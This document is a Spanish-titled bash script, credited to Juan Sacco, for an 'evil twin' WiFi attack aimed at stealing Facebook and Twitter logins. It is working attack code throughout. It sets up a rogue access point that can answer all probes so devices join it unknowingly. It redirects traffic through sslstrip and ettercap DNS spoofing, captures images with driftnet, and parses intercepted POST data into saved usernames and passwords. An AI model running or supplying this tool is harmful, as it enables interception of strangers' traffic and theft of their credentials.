Gemelo.sh - Hackeando Facebook y Twitter desde WIFI

1. #!/bin/bash
2. var=$(grep "nameserver" /etc/resolv.conf | awk '{print $2}' |wc -l) # count the number of nameservers in resolv.conf
3. if [[ $var = 1 ]];then  # if 1, use it in dhcpd.conf
4.   apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}')
5. elif [[ $var > 1 ]];then
6.   apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ',')
7.   apdns=${apdns//,/", "}                           # add a space after all commas
8.   apdns=${apdns%", "}                              # delete the final comma/space
9. else apdns=0 # default in case resolv.conf is empty, which would prevent dhcpd starting
10. fi
11.  
12. RED=$(tput setaf 1)
13. GREEN=$(tput bold ; tput setaf 2)
14. YELLOW=$(tput bold ; tput setaf 3)
15.  
16. # Network questions
17. echo $GREEN
18. echo "Juan Sacco - @juansacco - juansacco@gmail.com"
19. echo "Wifi - Gemelo Malvado MITM"
20. echo
21. echo $YELLOW
22. ip route show | awk '(NR == 1) { print "Gateway :", $3,"    ", "Internet Interface :", $5}'
23. echo
24. iface=$(ip route show | awk '(NR == 1) { print $5}')
25. gateway=$(ip route show | awk '(NR == 1) { print $3}')
26. echo $GREEN
27. echo "Enter the networks gateway IP address or press enter to use $gateway:"
28. echo $YELLOW
29. read -e gatewayip
30. if [ "$gatewayip" = "" ];then
31.    gatewayip=$gateway
32.    echo "$gatewayip selected as default."
33. fi
34. echo $GREEN
35. echo "Enter your interface that is connected to the internet or press enter to use $iface:"
36. echo $YELLOW
37. read -e internet_interface
38. if [ "$internet_interface" = "" ];then
39.    internet_interface=$iface
40.    echo "$internet_interface selected as default."
41. fi
42. echo $GREEN
43. echo "Select your interface to be used for the fake AP:"
44. echo $YELLOW
45. interfaces=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`
46. select fakeap_interface in $interfaces; do
47.   break;
48. done
49.  
50. echo $GREEN
51. echo "Enter the ESSID you would like your rogue AP to be called or press enter to use Fake_AP:"
52. echo  $YELLOW
53. read -e ESSID
54. if [ "$ESSID" = "" ];then
55.    ESSID="Fake_AP"
56.    echo "$ESSID selected as default."
57. fi
58. echo
59. sleep 2
60. clear
61.  
62. # Cleaning
63. killall sslstrip &> /dev/null
64. killall driftnet &> /dev/null
65. killall airbase-ng &> /dev/null
66. killall ettercap &> /dev/null
67. killall looparse &> /dev/null
68.  
69. # Start Fake Ap interface
70. airmon-ng start $fakeap_interface
71. fakeap=$fakeap_interface
72. fakeap_interface="mon0"
73.  
74. # Dhcpd creation
75. SUBNET=$(ip route show | awk '(NR == 2)' | cut -d '/' -f1)
76. if [ "$SUBNET" = "10.0.0.0" ]; then
77.   SUBNET="192.168.1.0"
78.   GATEWAY="192.168.1.1"
79.   RANGE="192.168.1.20 192.168.1.50"
80. else
81.   SUBNET="192.168.1.0"
82.   GATEWAY="192.168.1.1"
83.   RANGE="192.168.1.200 192.168.1.220"
84. fi
85. mkdir -p /tmp/Airssl
86. echo "authoritative;
87.  
88. default-lease-time 600;
89. max-lease-time 7200;
90.  
91. subnet $SUBNET netmask 255.255.255.0 {
92. option routers $GATEWAY;
93. ddns-update-style none;
94.  
95. option domain-name-servers $apdns;
96.  
97. range $RANGE;
98.  
99. }" > /tmp/Airssl/dhcpd.conf
100.  
101.  
102. # Fake ap setup
103. while true; do
104.   sleep 2
105.   clear
106.   echo $GREEN
107.   echo "
108.  
109.    Configuring FakeAP...."
110.  
111.   echo $YELLOW
112.   echo "Airbase-ng will run in its most basic mode, would you like to run  airbase-ng in respond to all probes mode?"
113.   echo
114.   echo "In this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes, providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly."
115.   echo  $RED "PLEASE USE THIS OPTION RESPONSIBLY. "
116.   echo $YELLOW
117.   echo " 1) Yes"
118.   echo " 2) No"
119.   echo -n " #? "
120.   read yn
121.   case $yn in
122.     1 ) AIRBASE=1 ; break ;;
123.     2 ) AIRBASE=0 ; break ;;
124.     * ) echo
125.    echo $RED"wrong choice" ;;
126. esac
127. done
128. sleep 2
129. clear
130.  
131. echo $GREEN
132. echo "
133.  
134.    Starting FakeAP..."
135.  
136. if [ "$AIRBASE" = "1" ]; then
137.   xterm -bg black -fg green -geometry 153x37+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
138. else
139.   xterm -bg black -fg green -geometry 153x37+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
140. fi
141. sleep 2
142.  
143. # Tables
144. echo
145. echo "
146.  
147.    Configuring forwarding tables..." $RED
148.  
149. ifconfig lo up
150. ifconfig at0 up &
151. sleep 1
152. ifconfig at0 $GATEWAY netmask 255.255.255.0
153. ifconfig at0 mtu 1400
154. route add -net $SUBNET netmask 255.255.255.0 gw $GATEWAY
155. iptables --flush
156. iptables --table nat --flush
157. iptables --delete-chain
158. iptables --table nat --delete-chain
159.  
160. echo 1 > /proc/sys/net/ipv4/ip_forward
161.  
162. iptables --flush
163. iptables --table nat --flush
164. iptables --delete-chain
165. iptables --table nat --delete-chain
166. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
167. iptables --append FORWARD --in-interface at0 -j ACCEPT
168. echo 1 > /proc/sys/net/ipv4/ip_forward
169. iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain && iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE && iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward
170. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
171. # DHCP
172. echo $GREEN
173. echo "
174.  
175.    Setting up DHCP..."
176.  
177. touch /var/run/dhcpd.pid
178. #chown dhcpd:dhcpd /var/run/dhcpd.pid
179. xterm -bg black -fg green -geometry 153x37-1+0 -T DHCP -e dhcpd -d -f -cf "/tmp/Airssl/dhcpd.conf" at0 & dchpid=$!
180. sleep 2
181.  
182. # Sslstrip
183. echo
184. echo "
185.  
186.    Starting sslstrip..." $YELLOW
187.  
188. sslstrip -f -p -k -l 10000 -w /tmp/Airssl/sslstrip.log 2> /dev/null & sslstripid=$!
189. sleep 2
190.  
191. # Ettercap
192. echo $GREEN
193. echo "
194.  
195.    Starting ettercap..."
196.  
197. #xterm -bg black -fg green -geometry 153x37+1-0 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -C -P dns_spoof -i at0 & ettercapid=$!
198. xterm -bg black -fg green -geometry 153x37+1-0 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -P dns_spoof -q -w /tmp/Airssl/etter.cap -i at0 & ettercapid=$!
199. sleep 2
200.  
201.  
202. ############################
203. ## Copied of yamas script ##
204. ############################
205. echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/Airssl/grepcred.txt
206. echo "looparse(){
207. while :
208. do
209.   clear
210.   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
211.   cat /tmp/Airssl/sslstrip.log |
212. awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
213. awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
214. egrep -i -f '/tmp/Airssl/grepcred.txt' |
215. awk -F \"=\" '{if (length(\$2) < 3) print \"\";
216. else if (\$1 ~/[W]/) print \$0;
217. else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
218. else print \"Login = \t\t\", \$2}' |
219. uniq
220. sleep 7
221. done
222.  }
223. looparse" > /tmp/Airssl/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
224. chmod +x /tmp/Airssl/looparse.sh
225. xterm -bg black -fg green -geometry 153x37-1-0 -T Passwords -e /tmp/Airssl/looparse.sh & looparseid=$! #here's the beauty
226. ############################
227. ############################
228.  
229. # Driftnet
230. echo $GREEN
231. echo "
232.  
233.    Starting driftnet..."
234.  
235. mkdir -p "/tmp/Airssl/Images_$(date +%d%m%y)"
236. driftnet -i at0 -a -d /tmp/Airssl/Images_$(date +%d%m%y) > /dev/null & dritnetid=$!
237. sleep 2
238.  
239.  
240. clear
241. echo
242. echo "
243.  
244.    Activated..."
245.  
246. echo $YELLOW
247. echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap.
248. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to "$HOME/Airssl/etter.cap".
249. Sslstrip captured passwords will be saved to $HOME/Airssl/passwords.txt.
250. Driftnet images will be saved to $HOME/Airssl/driftftnetdata"
251. echo
252. echo $RED
253. echo "
254.  
255.    IMPORTANT..."
256.  
257. echo "After you have finished please close airssl and clean up properly by hitting any key,
258. if airssl is not closed properly ERRORS WILL OCCUR "
259.  
260. read junk
261. echo
262. mkdir -p $HOME/Airssl
263.  
264. ############################
265. ## Copied of yamas script ##
266. ############################
267. cat /tmp/Airssl/sslstrip.log |
268. awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
269. awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
270. egrep -i -a -f /tmp/Airssl/grepcred.txt |
271. awk -F "=" '{if (length($2) < 4) print "";
272. else if ($1 ~/Website/) print $0;
273. else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
274. else print "Login = \t"$2}' |
275. uniq >> $HOME/Airssl/passwords.txt
276. if [ -f "$HOME/Airssl/passwords.txt" ]; then
277.    echo $GREEN "Passwords saved !"
278. else
279.    echo $RED "Error while saving passwords"
280. fi
281. ############################
282. ############################
283.  
284. cp -rf /tmp/Airssl/Images_$(date +%d%m%y) $HOME/Airssl
285. if [ -d "$HOME/Airssl/Images_$(date +%d%m%y)" ]; then
286.    echo $GREEN "Images saved !"
287. else
288.    echo $RED "Error while saving images"
289. fi
290.  
291. cp -rf /tmp/Airssl/etter.cap $HOME/Airssl
292. if [ -f "$HOME/Airssl/etter.cap" ]; then
293.    echo $GREEN "Capture file saved !"
294. else
295.    echo $RED "Error while Capture file"
296. fi
297.  
298. echo $GREEN
299. echo "
300.  
301.    Cleaning up airssl and resetting iptables..." $YELLOW
302.  
303.  
304. kill ${fakeapid} &> /dev/null
305. kill ${dchpid} &> /dev/null
306. kill ${sslstripid} &> /dev/null
307. kill ${ettercapid} &> /dev/null
308. kill ${dritnetid} &> /dev/null
309. kill ${looparseid} &> /dev/null
310.  
311. airmon-ng stop $fakeap_interface
312. airmon-ng stop $fakeap
313.  
314. echo "0" > /proc/sys/net/ipv4/ip_forward
315.  
316. iptables --flush
317. iptables --table nat --flush
318. iptables --delete-chain
319. iptables --table nat --delete-chain
320.  
321. rm -rf /tmp/Airssl
322.  
323. echo $GREEN
324. echo "
325.  
326.    Clean up successful..."
327.  
328. echo
329. echo "
330.  
331.    Thank you for using airssl, Good Bye..."
332.  
333. exit
334. Gemelo.sh - Hackeando Facebook y Twitter desde WIFI